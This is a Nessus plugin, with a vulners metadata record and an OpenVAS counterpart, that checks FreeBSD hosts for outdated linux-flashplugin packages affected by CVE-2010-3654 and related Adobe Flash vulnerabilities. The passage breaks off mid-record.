ID FREEBSD_PKG_76B597E4E9C611DF9E10001B2134EF46.NASL Type nessus Reporter This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2010-11-08T00:00:00
Description
Adobe Product Security Incident Response Team reports :
Critical vulnerabilities have been identified in Adobe Flash Player
10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and
Solaris, and Adobe Flash Player 10.1.95.1 for Android. These
vulnerabilities, including CVE-2010-3654 referenced in Security
Advisory APSA10-05, could cause the application to crash and could
potentially allow an attacker to take control of the affected system.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2019 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata registration: when `description` is set, the script only records
# the attributes below and leaves at the final exit(0); none of the package
# checks further down run in this mode.
if (description)
{
script_id(50505);
script_version("1.18");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# Eighteen CVE identifiers are attached to this single package check; the
# description text singles out CVE-2010-3654 (Security Advisory APSA10-05).
script_cve_id("CVE-2010-3636", "CVE-2010-3637", "CVE-2010-3638", "CVE-2010-3639", "CVE-2010-3640", "CVE-2010-3641", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644", "CVE-2010-3645", "CVE-2010-3646", "CVE-2010-3647", "CVE-2010-3648", "CVE-2010-3649", "CVE-2010-3650", "CVE-2010-3652", "CVE-2010-3654", "CVE-2010-3676");
script_name(english:"FreeBSD : linux-flashplugin -- multiple vulnerabilities (76b597e4-e9c6-11df-9e10-001b2134ef46)");
script_summary(english:"Checks for updated packages in pkg_info output");
script_set_attribute(
attribute:"synopsis",
value:
"The remote FreeBSD host is missing one or more security-related
updates."
);
# The description is the vendor advisory text as carried by the FreeBSD VuXML
# entry (see the licence header); it names the affected Flash Player versions,
# not the FreeBSD package versions tested by this plugin.
script_set_attribute(
attribute:"description",
value:
"Adobe Product Security Incident Response Team reports :
Critical vulnerabilities have been identified in Adobe Flash Player
10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and
Solaris, and Adobe Flash Player 10.1.95.1 for Android. These
vulnerabilities, including CVE-2010-3654 referenced in Security
Advisory APSA10-05, could cause the application to crash and could
potentially allow an attacker to take control of the affected system."
);
# Original reference (the attribute below stores the https form):
# http://www.adobe.com/support/security/bulletins/apsb10-26.html
script_set_attribute(
attribute:"see_also",
value:"https://www.adobe.com/support/security/bulletins/apsb10-26.html"
);
# Original reference (the attribute below stores the https form):
# http://www.adobe.com/support/security/advisories/apsa10-05.html
script_set_attribute(
attribute:"see_also",
value:"https://www.adobe.com/support/security/advisories/apsa10-05.html"
);
# https://vuxml.freebsd.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html
# NOTE(review): the stored value is a plain-http nessus.org short link; it
# presumably resolves to the VuXML page named above -- confirm before relying
# on it in a report.
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?ba5a6346"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
# CVSS v2 base vector (base score 9.3): network attack vector, medium access
# complexity, no authentication, complete impact on confidentiality, integrity
# and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
# Exploit-maturity flags: the plugin records that public exploits exist (Core,
# Metasploit and CANVAS are each flagged) and that the issue is exploited by
# malware. For triage, a finding from this plugin is therefore a
# high-priority patch item, not a theoretical one.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Adobe Flash Player "Button" Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# Declared as a "local" plugin: the result is derived from package data
# collected on the host (see the required KB keys below), not from probing a
# network service.
script_set_attribute(attribute:"plugin_type", value:"local");
# One CPE per FreeBSD package name tested later in the script, plus the OS.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:linux-f8-flashplugin");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:linux-flashplugin");
script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
# Timeline recorded by the plugin: disclosure 2010/09/28, fixed package
# 2010/11/06, plugin published 2010/11/08.
script_set_attribute(attribute:"vuln_publication_date", value:"2010/09/28");
script_set_attribute(attribute:"patch_publication_date", value:"2010/11/06");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/11/08");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
# NOTE(review): ACT_GATHER_INFO is presumably the non-intrusive
# information-gathering category -- confirm against the scanner's category
# definitions.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"FreeBSD Local Security Checks");
# Depends on ssh_get_info.nasl and on three knowledge-base keys; the same
# three keys are tested again at run time after this block, so a scan without
# working local (credentialed) checks produces an audit message rather than a
# finding or a "not affected" verdict.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
# Run-time check. Three knowledge-base preconditions are tested first; each
# failure is reported through audit() with its own reason, so a host that was
# not scanned with local checks is never silently treated as patched.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}
if (!get_kb_item("Host/FreeBSD/release"))
{
  audit(AUDIT_OS_NOT, "FreeBSD");
}
if (!get_kb_item("Host/FreeBSD/pkg_info"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# flag counts how many of the package specifications below matched.
# Every specification is always evaluated (no early exit), so each matching
# package can contribute to the saved report.
# NOTE(review): pkg_test() comes from freebsd_package.inc; it presumably
# compares the installed package version from the pkg_info data against the
# "name<version" specification -- confirm against that include. The result is
# a package-version comparison only; it does not test whether the plugin is
# actually loaded by a browser.
flag = 0;
foreach spec (make_list(
  "linux-flashplugin<9.0r289",
  "linux-f8-flashplugin<10.1r102",
  "linux-f10-flashplugin<10.1r102"))
{
  if (pkg_test(save_report:TRUE, pkg:spec)) flag++;
}

if (!flag)
{
  # No specification matched: report the host as not affected.
  audit(AUDIT_HOST_NOT, "affected");
}
else
{
  # At least one outdated package: raise the finding on port 0, attaching the
  # package report text only when report verbosity is above 0.
  if (report_verbosity > 0)
  {
    security_hole(port:0, extra:pkg_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}
{"id": "FREEBSD_PKG_76B597E4E9C611DF9E10001B2134EF46.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : linux-flashplugin -- multiple vulnerabilities (76b597e4-e9c6-11df-9e10-001b2134ef46)", "description": "Adobe Product Security Incident Response Team reports :\n\nCritical vulnerabilities have been identified in Adobe Flash Player\n10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and\nSolaris, and Adobe Flash Player 10.1.95.1 for Android. These\nvulnerabilities, including CVE-2010-3654 referenced in Security\nAdvisory APSA10-05, could cause the application to crash and could\npotentially allow an attacker to take control of the affected system.", "published": "2010-11-08T00:00:00", "modified": "2010-11-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/50505", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.adobe.com/support/security/bulletins/apsb10-26.html", "https://www.adobe.com/support/security/advisories/apsa10-05.html", "http://www.nessus.org/u?ba5a6346"], "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "type": "nessus", "lastseen": "2021-01-07T10:45:52", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:136141256231068493", "OPENVAS:1361412562310801630", "OPENVAS:1361412562310801629", "OPENVAS:801629", "OPENVAS:68493", "OPENVAS:1361412562310850149", "OPENVAS:850149", "OPENVAS:69045", "OPENVAS:136141256231069045", "OPENVAS:801630"]}, {"type": "freebsd", "idList": ["76B597E4-E9C6-11DF-9E10-001B2134EF46"]}, {"type": "nessus", "idList": 
["SUSE_11_FLASH-PLAYER-101104.NASL", "ADOBE_AIR_APSB10-26.NASL", "REDHAT-RHSA-2010-0834.NASL", "SUSE_11_3_FLASH-PLAYER-101104.NASL", "SUSE_11_1_FLASH-PLAYER-101104.NASL", "ADOBE_ACROBAT_APSB10-28.NASL", "SUSE_11_2_FLASH-PLAYER-101104.NASL", "FLASH_PLAYER_APSB10-26.NASL", "REDHAT-RHSA-2010-0867.NASL", "REDHAT-RHSA-2010-0829.NASL"]}, {"type": "redhat", "idList": ["RHSA-2010:0829", "RHSA-2010:0834", "RHSA-2010:0934", "RHSA-2010:0867"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25091", "SECURITYVULNS:VULN:11619", "SECURITYVULNS:DOC:25153", "SECURITYVULNS:VULN:11239", "SECURITYVULNS:DOC:26202", "SECURITYVULNS:DOC:25089"]}, {"type": "suse", "idList": ["SUSE-SA:2010:058", "SUSE-SA:2010:055"]}, {"type": "cve", "idList": ["CVE-2010-3650", "CVE-2010-3645", "CVE-2010-3637", "CVE-2010-3649", "CVE-2010-3676", "CVE-2010-3654", "CVE-2010-3652", "CVE-2010-3642", "CVE-2010-3643", "CVE-2010-3644"]}, {"type": "symantec", "idList": ["SMNTC-44679", "SMNTC-44504", "SMNTC-44684"]}, {"type": "gentoo", "idList": ["GLSA-201101-09"]}, {"type": "exploitdb", "idList": ["EDB-ID:16667", "EDB-ID:34522", "EDB-ID:15426"]}, {"type": "saint", "idList": ["SAINT:B5657AFB338B1DE1878BED26F331E06E", "SAINT:0F4E1C742351171F6A7E81111D6518CC", "SAINT:81B135AB58085F29890F2C48E7DD9175"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_BUTTON"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95444"]}, {"type": "canvas", "idList": ["ADOBE_FLASH_BUTTON"]}, {"type": "seebug", "idList": ["SSV:20218", "SSV:70138", "SSV:71175", "SSV:71627"]}, {"type": "threatpost", "idList": ["THREATPOST:DAFE4C40F672DA84E11AC6FFC2BBB716", "THREATPOST:2606196DD3F3AF9E687F63426BF161F9", "THREATPOST:731A5A35EAC80BFED9629C1E359C6390"]}, {"type": "cert", "idList": ["VU:298081"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3AD9D29B4D1CC018F70F8B0E9B899EC2", "EXPLOITPACK:92497A482BC4B4CFEF587918EBBCB69E"]}, {"type": "jvn", "idList": ["JVN:48425028"]}], "modified": 
"2021-01-07T10:45:52", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2021-01-07T10:45:52", "rev": 2}, "vulnersScore": 9.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50505);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3676\");\n\n script_name(english:\"FreeBSD : linux-flashplugin -- multiple vulnerabilities (76b597e4-e9c6-11df-9e10-001b2134ef46)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Product Security Incident Response Team reports :\n\nCritical vulnerabilities have been identified in Adobe Flash Player\n10.1.85.3 and earlier versions for Windows, Macintosh, Linux, and\nSolaris, and Adobe Flash Player 10.1.95.1 for Android. 
These\nvulnerabilities, including CVE-2010-3654 referenced in Security\nAdvisory APSA10-05, could cause the application to crash and could\npotentially allow an attacker to take control of the affected system.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-26.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n # http://www.adobe.com/support/security/advisories/apsa10-05.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/advisories/apsa10-05.html\"\n );\n # https://vuxml.freebsd.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba5a6346\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f8-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplugin\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplugin<9.0r289\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f8-flashplugin<10.1r102\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<10.1r102\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "50505", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f8-flashplugin", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin"], "scheme": null}
{"openvas": [{"lastseen": "2018-01-22T13:05:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-01-22T00:00:00", "published": "2010-11-17T00:00:00", "id": "OPENVAS:136141256231068493", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068493", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f8-flashplugin\n linux-f10-flashplugin\n\nFor details on the issues addressed, please visit the referenced\nsecurity advisories.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/bulletins/apsb10-26.html\nhttp://www.adobe.com/support/security/advisories/apsa10-05.html\nhttp://www.vuxml.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68493\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-17 03:33:48 +0100 (Wed, 17 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3676\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f8-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f8-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:09:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "The remote host is missing an update to the system\nas announced in the referenced 
advisory.", "modified": "2017-02-09T00:00:00", "published": "2010-11-17T00:00:00", "id": "OPENVAS:68493", "href": "http://plugins.openvas.org/nasl.php?oid=68493", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "sourceData": "#\n#VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 76b597e4-e9c6-11df-9e10-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f8-flashplugin\n linux-f10-flashplugin\n\nFor details on the issues addressed, please visit the referenced\nsecurity advisories.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/bulletins/apsb10-26.html\nhttp://www.adobe.com/support/security/advisories/apsa10-05.html\nhttp://www.vuxml.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(68493);\n script_version(\"$Revision: 5245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-09 09:57:08 +0100 (Thu, 09 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-17 03:33:48 +0100 (Wed, 17 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3676\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f8-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package 